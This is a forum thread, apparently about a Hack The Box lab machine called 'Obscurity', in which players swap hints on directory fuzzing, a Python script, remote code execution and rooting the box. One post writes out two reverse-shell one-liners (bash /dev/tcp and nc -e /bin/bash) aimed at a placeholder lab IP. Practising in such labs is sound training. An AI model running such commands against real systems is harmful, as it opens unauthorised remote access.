Obscurity

Type your comment> @djbrains said:

Type your comment> @w4x said:

Type your comment> @djbrains said:

@clubby789 ,what is the intended way? I got 2 ways now. One gave me the root password and the other only the flag.

The goal isn’t to root the machine ? x)
Rooting or root access? :wink:

Virtualbox?

Excellent box and pretty straight forward :smiley: I found two ways to root it :wink: don’t know which one was the intended but both were fun

Type your comment> @zuk4 said:

Hi All,

I’m new in the hacking world and I have decide to try this machine, but I’m struggling to understand the py script or even run it, I’m not a python person, my mistake it seems.

So I have found the directory and the py script and I need help to understand it, is anyone able to help me?

Thank you

bro how you found the secre directory and py file can you help me please

Hi,

I’m stuck with the dir… no way to find it. Can anyone give me a nudge?
I’ve tried all the fuzzing tools but with no luck… also manually with the same result.

So I’ve found the place in the foothold where I can manipulate input to the server to achieve command execution and I’ve written a script that can encode and then execute either system commands or instructions in parseltongue. However, I cannot figure out how to get a reverse shell or even just exfil data. The only way that I know for a fact my commands can be run by the system is by sending a “wget” and setting up a HTTP server on my box and seeing the file request go through. However, if I try to run a
bash -i >& /dev/tcp/10.10.x.x/31337 0>&1 or a
nc -e /bin/bash 10.10.x.x 31337
I get no reverse shell. I’ve reset the box and still no reverse shell, since I’ve seen some people try that. I feel like I’m on the right track, but could use a nudge in the right direction to actually get on the box.

Edit: Got shell, and then after some work got user. Huge thanks to @sChr0D1NGer for solving my reverse shell problems! The hint that worked for me: system commands may not be able to do what you think they can, so stick to native parseltongue.

Edit2: Aaaaand… root! I don’t know if I solved as intended, because I took advantage of my ability to read the code to capture something during execution rather than exploit execution. Could any others with root let me know if I got system as intended?

Cannot find initial footholds…any hint…nothing seems to work

I found the py file and gone through it like 2 days and I cannot found a way to proceed further.

I think it might be possible through the ex** code but I’m not sure as I’m new to this and cannot proceed but scratch my head around it.

Can someone help me out through it?

Type your comment> @d4sh1981 said:

Seem to be having a problem with the initial fuzzing, don’t seem to be able to find the directory

Update, i think i have found the command that will fine the directory. But it is making no sense. Can someone message me with a nudge of that i am missing. Have ffuff running and not returning every line in the file.

I found the .py file, but I have no idea on how to exploit it, any hints or references would be appreciated, cheers!

well, i’ve got a rough idea on what to exploit for RCE, but still not sure how to do so

Someone please pm for RCE , i think i know where i should serve the payload but nothing I am sending returns anything.

Best I can do is 404 or 400

Good box, once I rooted it I then learnt about 2 other ways to root it.
So I now have a totaly of 3 ways to root the box.

You can PM via discord if you need help, Discord only, please.

Recently joined HTB, so my first root here. Nice machine, simple and straightforward.

My tips:

  • simulate your RCE payload locally
  • read the code
  • things may disappear quckly, find a way to catch them

Really like this machine and all the python scripts you had to make or edit. PM for nudges.

Type your comment> @TheWick33 said:

Type your comment> @zuk4 said:

Hi All,

I’m new in the hacking world and I have decide to try this machine, but I’m struggling to understand the py script or even run it, I’m not a python person, my mistake it seems.

So I have found the directory and the py script and I need help to understand it, is anyone able to help me?

Thank you

bro how you found the secre directory and py file can you help me please

I have used dirb with a wordlist file, that was the easiest part, at least for me.

Should i try to bruteforce the key for user ?

Type your comment> @Hagbard70 said:

Should i try to bruteforce the key for user ?

this is what I have been trying to do with no luck. I am not good with the logic/math of it to do what other people are saying here.

Any nudges?

For people asking if their method for root was intended: It should follow a similar gist to the rest of the box.

Type your comment> @Hagbard70 said:

Should i try to bruteforce the key for user ?

I don’t think it’s an intended way. you would rather focus on “areas” that key is used

found .py file by hand… i just read the webpage… but my python knowledge is lacking here… could somebody give me a nudge? i’m spending way to much time on this step of understanding the py file…